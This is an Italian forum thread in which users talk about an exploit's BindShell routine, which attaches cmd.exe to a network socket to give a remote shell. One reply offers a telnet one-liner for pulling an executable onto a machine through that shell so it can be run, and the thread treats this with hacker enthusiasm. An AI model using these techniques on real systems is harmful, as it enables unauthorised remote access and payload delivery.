|
|||||||
|
|
|
![]() |
|
|
Strumenti |
|
|
#1 |
|
Bannato
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 7029
|
incredibile!! O.o
guardate qua ...
non è tanto l'exploit della keybd_event la cosa che mi stupisce (capirai, è assai banale, nella maggior parte dei desktop è pure inutile se ho capito come funziona...), ma quello che viene eseguito nella funzione BindShell!! viene creato un processo cmd.exe i cui handle stdin e stdout vengono settati direttamente a s2, che è un socket descriptor!!! ma si può fare? ![]() cioè, Winsock2 è fatto apposta per fornire shell remote agli hackers che installano trojans o sbaglio...? ![]() se è così mi cade giusto a fagiuuoolo
|
|
|
|
|
|
#2 |
|
Senior Member
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 414
|
Si infatti cosa molto banale ma estremamente pericolosa, per esempio tanto per pensare un pò da hacker
Codice:
telnet miamacchina miaporta >file.exe a logicamente per eseguirlo hai a disposizione la scell Cavolo che fico!!! |
|
|
|
|
|
#3 | |
|
Senior Member
Iscritto dal: Apr 2000
Città: Roma
Messaggi: 15625
|
Quote:
__________________
0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12 |
|
|
|
|
|
|
#4 | |
|
Bannato
Iscritto dal: Feb 2005
Città: Roma
Messaggi: 7029
|
Quote:
e poi lo so che può tornare mooolto comodo, ehehehe lo so eccome |
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 16:40.




















